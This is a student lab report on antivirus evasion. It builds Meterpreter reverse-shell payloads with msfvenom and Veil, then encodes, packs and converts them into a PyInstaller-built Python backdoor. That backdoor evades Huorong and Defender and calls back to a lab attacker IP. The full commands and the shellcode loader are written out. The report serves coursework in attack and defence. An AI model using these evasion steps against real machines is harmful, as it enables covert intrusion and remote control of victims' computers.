20232307 2025-2026-1 《网络与系统攻防技术》实验三实验报告

news/2025/10/27 18:38:36/文章来源:https://www.cnblogs.com/20232307MY/p/19167809

20232307 2025-2026-1 《网络与系统攻防技术》实验三实验报告

1. 实验内容

本周学习内容:免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。
杀毒软件原理包括:特征码、启发式、基于行为;文件校验和;云查杀;机器学习。
免杀技术包括:修改特征码;修改校验和;花指令免杀;加壳免杀;内存免杀。

(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • veil,加壳工具
  • 使用C+shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀。
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。

(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。

2.实验要求

  • 掌握免杀原理与技术
  • 回答问题

(1)杀软是如何检测出恶意代码的?
①特征码检测:提取恶意代码的唯一特征,与杀软数据库中的特征库比对,命中即判定为恶意。
②基于行为分析:监控程序运行时的异常行为,比如主动连接陌生IP、修改系统注册表、注入其他进程、读取敏感文件,只要触发预设行为规则就会报警。
③启发式检测:不依赖已知特征,通过分析程序的可疑程度判断,比如代码包含大量混淆、无签名的可执行文件、频繁创建网络连接,结合算法判定为潜在恶意。
④云查杀:将可疑文件上传到云端,在隔离环境中运行,观察其完整行为,再结合全球威胁数据库判定是否为恶意。
⑤机器学习:收集大量样本,提取特征维度。用训练模型学习。预测时,对新文件提取相同维度的特征,输入训练好的模型。模型根据特征计算“恶意概率”,若超过阈值则判定为恶意。
⑥文件校验和:杀软厂商会对已知恶意文件计算校验和,当用户文件被扫描时,杀软会计算其校验和,与特征库比对。若匹配,则直接判定为恶意代码。

(2)免杀是做什么?
免杀一般是通过技术手段对恶意软件做处理,修改恶意代码的特征、行为或结构,让它不被杀毒软件所检测,或判定其为恶意。

(3)免杀的基本方法有哪些?
①修改特征码:特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串。定位特征码并修改。
②修改校验和:定位特征码和校验和,修改特征码时需要同步重新计算校验和
③花指令免杀:花指令是否存在对程序的执行结果没有影响。为一个程序添加一段花指令之后,程序的部分偏移会受到影响,如果反病毒软件不能识别这段花指令,那么它检测特征码的偏移量会整体位移一段位置,自然也就无法正常检测木马。
④加壳免杀:是利用特殊的算法,对EXE、ELF、DLL文件里的资源进行压缩或者加密。压缩或加密之后的文件可以独立运行,解压或解密过程完全隐蔽,当我们运行这个加壳的程序时,系统首先会运行程序的“壳”,然后由壳将加密的程序逐步还原到内存中,最后运行程序。

3.实验过程

3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

3.1.1 免杀效果参考基准

使用检测平台VirusTotal
VirusTotal平台需要人机验证,这一步会有点麻烦,建议使用网易邮箱(@163.com)登录,会免其困扰。

kali虚拟机IP:192.168.190.137
image

  • msfvenom直接生成meterpreter可执行文件

使用如下命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.137 PORT=2307 -f exe > met.exe

利用Metasploit框架的msfvenom工具生成Windows平台的反向TCP后门程序。LHOST=192.168.190.137,设置的是攻击者的IP地址(Kali虚拟机的IP),靶机会主动向该IP发起连接。-f exe:指定输出格式 Windows可执行文件。

image

然后把生成的文件传输到windows主机上,使用VirusTotal检测其安全性,检测结果为50/70。即有70个杀毒引擎检测这个文件,有50个杀毒引擎判断其为恶意软件。
那么我们就以50/70为免杀效果参考基准。

eb93408fc679df5749dd14aaa0fbc300

3.1.2 使用msfvenom生成其他文件

3.1.2.1 生成编码的exe文件

使用如下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86

利用msfvenom生成经过编码优化的Windows平台反向TCP后门程序。此处我使用--platform windows强制指定平台,明确目标平台为Windows;使用--arch x86强制指定架构:明确目标 CPU 架构为x86。

image

将2307ex3-2.exe传输到windows主机后使用VirusTotal检测,可以得到检出率为45/72,与参考基准相比较略有效果,算是有稍许的免杀效果吧。

04ec45fc569795dbc102c7e3b4116280

  • 对文件进行10次编码

使用如下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  -i 10 -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe > 20232307ex3-3.exe

使用shikata_ga_nai编码器对 payload进行编码,编码迭代次数为10次,将生成的内容输出到名为20232307ex3-3.exe的文件中。

image

将2307ex3-3.exe传输到windows主机后使用VirusTotal检测,可以得到检出率为44/72

2675686263de8338e9241b9f942efde0

1次编码和10次编码差别不大,没什么好的免杀效果。

3.1.2.2 生成jar文件和编码的jar文件

使用如下命令:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 x>metjar20232307.jar

payload类型是Java环境下的反向TCP连接型Meterpreter,将生成的内容输出到名为metjar20232307.jar的文件中,这是一个 Java归档文件,可在安装了JRE的系统中运行。

6e0bd420f4de597e85c4eb2d8b70bef1

将metjar20232307.jar传输到windows主机后使用VirusTotal检测,可以得到检出率为35/64

bed858c8b3a01edf9ad5c183db456dcf

与前面的编码的exe文件相比,免杀效果得到了一定的提升,颇有成效!

  • 对文件进行10次编码

使用如下命令:

msfvenom -p java/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.190.137 LPORT=2307 x>met-encode-jar20232307.jar

使用shikata_ga_nai编码器对payload进行编码,目的是通过混淆代码尝试规避杀毒引擎的静态特征检测。-i 10:设置编码迭代次数为 10 次。

image

将met-encode-jar20232307.jar传输到windows主机后使用VirusTotal检测,可以得到检出率为35/66

54d3330c8ba04bf80450e85b5900486b

可见,1次编码和10次编码根本就没有什么区别...
可能原因:Java.jar文件的编码迭代效果有限,可能原因是编码器与Java平台不兼容、字节码易分析性强,且检测技术已针对Java恶意程序的特征进行了专项优化。

3.1.2.3 生成php文件和编码的php文件

使用如下命令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 x> metphp_20232307.php

payload类型为PHP环境下的反向TCP连接型Meterpreter,将生成的恶意代码输出到名为metphp_20232307.php的文件中。

image

将metphp_20232307.php传输到windows主机后使用VirusTotal检测,可以得到检出率为24/61

4c0492f778c8fbe32d49c52933c0920d

与前面生成的jar文件相比,免杀效果再一次得到了提升,免杀效果已经从基准的50下降到了24,颇有成效!

  • 对文件进行10次编码

使用如下命令:

msfvenom -p php/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.190.137 LPORT=2307 x> met_20232307_10.php

使用shikata_ga_nai编码器对PHP payload进行编码,设置编码迭代次数为10次,通过增加代码复杂度提升免杀概率。

image

将metphp_20232307_10.php传输到windows主机后使用VirusTotal检测,可以得到检出率为8/62

16a5ca46997f431f89821c76e76dacea

迄今为止免杀效果最好的一次!php文件+10次编码,检出率由基准的50/72下降到了8/62!

3.2 使用veil免杀工具

3.2.1 下载veil

使用如下命令:

sudo apt -y install veil    #安装veil
/usr/share/veil/config/setup.sh --force  --silent  #这一步耗费了相当长的时间啊!!!

89dfefdb4e1d6de020f1d1d8f9b33535

强制以静默模式运行 Veil 工具的安装并配置脚本

195c7891b3ba719dd3110fefbdb7bafe

3.2.2 使用veil生成可执行文件

使用如下命令:

veil
Veil>:use 1
Veil>:list
Veil>:ues 7

输入use 1进入Evasion躲避模式,用以专门生成能够躲避主流杀毒软件检测的恶意可执行文件。输入命令list查看可用的载荷种类。

image

image

在此处选择c/meterpreter/rev_tcp.py,输入use 7,用于生成C语言格式的Meterpreter反向TCP payload的脚本。

选择后输入配置信息:

set LHOST 192.168.190.137 
set LPORT 2307 
generate   #开始生成载荷

image

将payload20232307.exe传输到windows主机后使用VirusTotal检测,可以得到检出结果为39/71

3864202db328a0a57cc65164bfbc5bcb

感觉免杀效果还可以吧。

3.3 C语言调用shellcode

使用如下命令:

msfvenom -p windows/meterpreter/reverse tcp LHOST=192.168.190.137 LPORT=2307 -f c

指定payload类型为Windows系统下的反向TCP连接型Meterpreter,以C语言数组形式输出恶意载荷。

ff85f38bbcd3bca19830aabc43c66ac0

使用vim编辑器,给上面生成的恶意代码添加一个main函数,函数如下所示:

int main() {
int(*func)()=(int(*)())buf;
func();
}

添加效果如下图所示:

c5037824466b48f58608ed83cacb28c7

使用 MinGW-w64 编译器将C文件编译为可执行文件,使用如下命令:

i686-w64-mingw32-g++ shell_2307.c -o shellcode_20232307.exe

8ff31609e9890f765de94b0a26e9cc3c

可以查找到文件:

image

将shellcode_20232307.exe传输到windows主机后使用VirusTotal检测,可以得到检出结果为40/71

6a84da79a95dcf77f93382d0f72a89d9

感觉免杀效果一般。

3.3 使用加壳工具

3.3.1 使用压缩壳UPX

使用如下命令:

upx shellcode_20232307.exe -o shellcode_20232307_upx.exe

对shellcode_20232307.exe原文件进行压缩处理,-o参数指定输出文件的名称,这里将压缩后的文件命名为shellcode_20232307_upx.exe。

0eb8e9a952c69160755ad72aceab1ccb

将shellcode_20232307_upx.exe传输到windows主机后使用VirusTotal检测,可以得到检出结果为43/72

9f8a27b2128ebc33db379bd024f025f2

压缩壳有一定的免杀效果,但是效果不显著。作为流行这么多年的加壳软件,也是可理解的。

3.3.2 使用加密壳

使用如下命令:

cp shellcode_20232307.exe /usr/share/windows-resources/hyperion/   #复制文件
cd /usr/share/windows-resources/hyperion      #切换目录

首先将可执行文件shellcode_20232307.exe复制到Hyperion工具的资源目录中,然后切换当前工作目录至hyperion工具的安装目录

3b4c0e6264d1aa907a3edf8f9d73d99b

wine hyperion.exe -v shellcode_20232307.exe shellcode_hyp_20232307.exe

通过Wine工具运行Windows平台的hyperion加密程序,对指定可执行文件进行加密处理,加密后文件输出到shellcode_hyp_20232307.exe。

6b3c381ae7adf69a0c9a3fce371cbf9e

可以在路径下查找到文件:

image

将shellcode_hyp_20232307.exe传输到windows主机后使用VirusTotal检测,可以得到检出结果为51/71

56722e59157336d002a323c9215e9db7

加密壳的免杀效果非常一般。原因就在于加密过的代码段的熵太高。

3.4 组合使用msfvenom工具与加壳技术

3.4.1 使用msf + 压缩壳

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00'LHOST=192.168.190.137 LPORT=2307 -f c> 20232307_shellcode_multi.c    #生成Windows反向TCP Meterpreter载荷,经10次shikata_ga_nai编码,以C数组形式保存到文件
vim 20232307_shellcode_multi.c    #通过vim编辑器向文件中添加main()函数
i686-w64-mingw32-g++ 20232307_shellcode_multi.c -o 20232307_shellcode_multi.exe    # 使用MinGW-w64编译器将C文件编译为32位Windows可执行文件

d138faa89b4f2bdc97906cc105a6ba8f

在相应路径下可以查看到生成的文件

image

再使用如下指令对刚刚的20232307_shellcode_multi.exe文件进行加压缩壳:

upx 20232307_shellcode_multi.exe -o 20232307_shellcode_multi_2.exe

5751c516dfb4e7742eacb77b62a946bc

将20232307_shellcode_multi.exe和20232307_shellcode_multi_2.exe传输到windows主机后使用VirusTotal检测

20232307_shellcode_multi.exe(不加压缩壳)的检出结果是33/72
014099c4e7c477db15e3d0374da6043f

20232307_shellcode_multi.exe(加压缩壳)的检出结果是35/72
897a93a63a23e5a14b778c49134dd18b

3.4.2 使用msf + 加密壳

使用如下命令:

cp 20232307_shellcode_multi_2.exe /usr/share/windows-resources/hyperion/    #将可执行文件复制到Hyperion的目录
cd /usr/share/windows-resources/hyperion    #切换到Hyperion工具所在目录
wine hyperion.exe -v 20232307_shellcode_multi_2.exe 20232307_shellcode_multi_3.exe    #通过wine运行Hyperion加密工具,对指定可执行文件进行加密,输出加密后的文件

841ee6b256af71d9af1e69695e6e2fd7

将20232307_shellcode_multi_3.exe传输到windows主机后使用VirusTotal检测,检出结果是50/71

a35e4b7e4c04d0627bc5ee3869f9c1bc

杀毒软件查杀:
此处使用火绒安全,版本是6.0.7.14

image

使用自定义查杀,检测刚刚生成的三个文件:

image

如上图所示,都没逃过杀毒软件的查杀啊!!!

最后再换一种组合技:

3.4.3 使用Metasploit框架生成Python格式的Meterpreter反向TCP payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.190.137 LPORT=2307 -f raw >20232307_py.py

通过msfvenom生成基于Python的恶意脚本。指定payload类型为Python环境下的反向向TCP连接型 Meterpreter,将生成的恶意代码输出到名为20232307_py.py的Python脚本文件中。

image

在相应的路径里面可以查找到生成的python文件

image

python文件传输到windows主机后,使用如下命令,将python脚本文件打包成可执行文件

pyinstaller -Fw --hidden-import=getpass --hidden-import=code --hidden-import=platform --hidden-import=shlex 20232307_py.py

将Python脚本及其依赖项打包为独立的可执行文件并且将所有代码、依赖库和资源打包成一个单独的可执行文件。分别指定了getpass(处理密码输入)、code(交互式解释器相关)、platform(获取系统信息)、shlex(解析命令行参数)四个模块,确保打包后能正常运行。

image

将生成的可执行文件放入VirusTotal平台进行检测,得到检测结果12/72,效果还是不错的!

5744e43ad140321d0332cb2dfcec8227

使用火绒安全查杀:

979760206c18cab073cca4d2a5df9d59
杀软并没有检测出异常

使用windows里面的Microsoft Defender再次检测:

image

依然没有检测出异常,成功了!!

3.5 杀软开启的情况下实现回连

使用3.4.3中的方法(Metasploit框架生成Python格式的Meterpreter反向TCP payload):

kali虚拟机中打开Metasploit
使用命令如下:

msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp   //注意此处命令不同于实验二,此处是python/meterpreter/reverse_tcp,而不是windows/meterpreter/reverse_tcp
set LHOST 192.168.190.137
set LPORT 2307
exploit

结果如下图所示:

image

windows主机中运行20232307_py.exe文件实现回连
20232307_py.exe
323966aa177ed695d51371b9b784f588

kali虚拟机中输入dir,可以看到20232307_py.exe所在文件夹的目录。

414f7eed19f852da6399d1e5403a3a54

回连成功!

4.问题及解决方案

  • 问题一:

在3.1.2.1的生成exe文件中,我使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86时出现报错,如下图所示:

image

  • 问题一解决方案:

这个错误的原因是字符编码不兼容,具体是 UTF-8 和 ASCII-8BIT 编码之间的冲突。
使用命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.190.137 LPORT=2307 -f exe -o 2307ex3-2.exe --platform windows --arch x86 后运行成功

image

  • 问题二:

在 3.4.3 使用Metasploit框架生成Python格式的Meterpreter反向TCP payload这一步骤的“windows将python脚本打包成可执行文件”输入指令:pyinstaller -Fw --hidden-import=getpass --hidden-import=code --hidden-import=platform --hidden-import=shlex 20232307_py.py时出现报错,如下图所示:

78ba47c65ab8cf52733c7182374f02c5

  • 问题二解决方案:

这是PyInstaller 未安装或未配置到系统环境变量导致的。运行pip3 install pyinstaller后再运行原指令即可解决。
image

5.学习思考及感悟

本次实验耗费了我比较长的时间,下载veil的过程真的是相当折磨,我也是寻求了多方的帮助,也尝试了多种各种各样的下载方式,也在此非常感谢同学们的帮助。在最后的回连操作中也是尝试了好多“组合技”,最终使用Metasploit框架生成Python格式的Meterpreter反向TCP payload终于成功了。
本次实验主要是关于免杀的原理与技术的实践,这让我认识到恶意代码生成是如此容易,并且最终我也做到了生成的恶意代码文件不被win 11系统所检测到,并且也不被杀毒软件所检测杀死,这也警示我在使用网络的过程中要谨防后门、恶意代码等。
在实验过程中还有一个比较深刻的体会是在执行命令行的过程中一定要理解这个命令到底是什么意思,千万不能直接无脑复制粘贴,理解命令的意思还可以帮助我们规避很多问题,不至于在解决一些无脑问题上耗费大量时间。
实验的过程并不是一帆风顺的,需要我有足够的理解力、耐心和细心,希望自己可以在下一次的实验中能有所进步。

参考资料

  • 实验三实验指导书
  • 20222408 2024-2025-1 《网络与系统攻防技术》实验三实验报告
  • 免杀Payload生成工具Veil的下载与使用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/948002.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

配置idea创建文件时自动生成注解(如类注释、作者信息等)

可以按照以下步骤操作: 1. 配置类 / 接口的文件模板 适用于创建 Java 类、接口、枚举等文件时自动生成注释:打开设置:File > Settings(Windows/Linux)或 IntelliJ IDEA > Preferences(Mac)进入 Editor &g…

产品经理如何使用AI Agent智能体?一份深度测评与实战指南

引言 当你还在不同的AI工具中频繁切换时,一个名为“AI Agent”智能体的集合性工具,已经成为很多产品经理爱不释手的工具了。什么是产品经理的AI Agent智能体?它不是一个单点功能的AI工具,而是能充分理解逻辑、联系…

手机AIldquo;造反rdquo;了?你可能还不知道的四件大事儿

手机AI“造反”了?你可能还不知道的四件大事儿哎,自打ChatGPT火了以后,咱们是不是都觉得云上的AI特牛?啥都能聊,啥都懂。但说实话,你用着不烦吗?网一卡就“正在连接”,老担心自己的聊天记录…

2025年10月办公家具公司评价榜:基于真实数据的权威推荐清单

在现代办公环境不断升级的背景下,企业对办公家具的需求呈现出多元化、专业化的发展趋势。根据中国家具协会发布的行业报告显示,2024年办公家具市场规模已达到约1800亿元,年增长率保持在8%左右。越来越多的企业管理者…

vue+antv/x6项目使用问题

今天在解决使用这个框架进行流程绘制的使用,出现了一个问题,就是在引入以下插件的时候,一直报错import { Stencil } from @antv/x6-plugin-stencil错误信息为解决方法为 在vite.config.ts文件中增加以下信息resolve…

2025年10月办公家具公司推荐榜:五大品牌综合对比与权威评测

在现代办公环境中,选择合适的办公家具公司成为企业管理者面临的重要课题。根据行业调研数据显示,2025年办公家具市场规模持续扩大,企业用户对家具的需求呈现多元化趋势。无论是初创企业追求性价比,还是成熟企业注重…

《程序员修炼之道:从小工到专家》前五分之一观后感

《程序员修炼之道》前五分之一的内容,像一剂清醒剂,打破了我对“程序员成长”的浅层认知。这部分围绕“职业程序员的自我定位”展开,没有高深技术讲解,却用直白的观点,点出了从“小工”起步的关键认知跃迁。 “你…

2025年10月办公家具公司对比榜:行业现状与选购要点

在现代商业环境中,办公家具的选择不仅关乎员工的工作效率与舒适度,更直接影响企业形象与运营成本。随着2025年企业数字化转型的加速,办公家具行业呈现出智能化、模块化、人性化的发展趋势。根据中国家具协会发布的行…

坐标系与投影关系

[地理坐标系]4326 (WGS-84) 4490 (CGCS2000)|投影 |投影v v3857 (Web Mercator) 32650 (UTM Zone50N)

2025年10月办公家具供应商综合评测:服务与性价比的平衡之道

作为企业管理者或行政负责人,您在规划办公空间时往往面临多重挑战:如何在家具采购中平衡预算与品质,如何确保家具符合人体工学标准以提升员工工作效率,以及如何在家具交付安装过程中避免影响正常办公节奏。根据行业…

10.27及动手动脑

今天上了两节UML统一建模语言课,上了两节算法与数据结构,上了四节java课,创建了mysql数据库及数据表 https://files.cnblogs.com/files/blogs/847689/动手动脑4.zip?t=1761560541&download=true

数据库三大范式、Union和Union all的区别

数据库三大范式什么是范式范式就是我们在设置数据库的表时,一些共同需要遵守的规范 掌握这些设计时的范式,可以让我们在项目之初,设计库的表结构更加合理和优雅三大范式之间的关系三大范式之间,是逐级递进的关系,…

2025年10月办公家具公司推荐榜单:五大品牌深度对比分析

作为企业管理者或行政负责人,您在规划办公环境时可能面临多重挑战:如何平衡预算与品质,如何确保家具符合人体工学与长期使用需求,如何应对紧急搬迁或扩租的时间压力。办公家具采购不仅关乎员工工作效率与健康,更直…

【2025-10-26】连岳摘抄

23:59我们无论做人做事,都应该多从人家的实际处境想,不只是从自己的主观做出发点来想问题。这样的话,我相信,做人一定会做得好,事业也一定可以成功。——陈鹤琴我们都是男人,好,说话可以直接一点,粗糙一点。可…

用gdb的动态视角看ret2text的实现

来看一道非常简单的栈溢出 、 ctfshow函数里面有read函数,最多可以读0x32个字节后门函数地址ida里很明显,0x8048521 exp本身不难写,下面看一下怎么用gdb确定偏移 from pwn import* io=process("./pwn") #i…

go包装bing搜索

package mainimport ("fmt""io""net/http""net/url""strings""github.com/PuerkitoBio/goquery" )func BingSearch(query string, num_results int) {//…

2025年临沂代理记账公司推荐排行及口碑好的靠谱公司解析

文章摘要 本文深入分析2025年临沂代理记账行业趋势,探讨如何基于口碑、排行和推荐选择靠谱代理记账公司。重点推荐华恒财税,其拥有财政局授权许可证、专业会计团队和三对一服务,服务山东省临沂市企业,解决财税、工…

上周动手动脑补交

https://files.cnblogs.com/files/blogs/847689/动手动脑3.zip?t=1761560090&download=true

网络同步学习记录

引擎选择 既然目标是DS架构那么,必须是源码版。需要从github上拉取源码并编译。 CS就像我的世界开放到局域网那种。服务端也是客户端。 DS就像腐竹开的服务器那样,专门的服务器,甚至是纯Linux的命令行环境,都没有图…

ZR 2025 NOIP 二十连测 Day 9

100 + 100 + 40 + 10 = 250, Rank 67/130.25noip二十连测day9 链接:link 题解:题目内 时间:4h (2025.10.27 14:00~18:00) 题目数:4 难度:A B C D\(\color{#F39C11} 橙\) \(\color{#52C41A} 绿\)*1000 *1600估分:…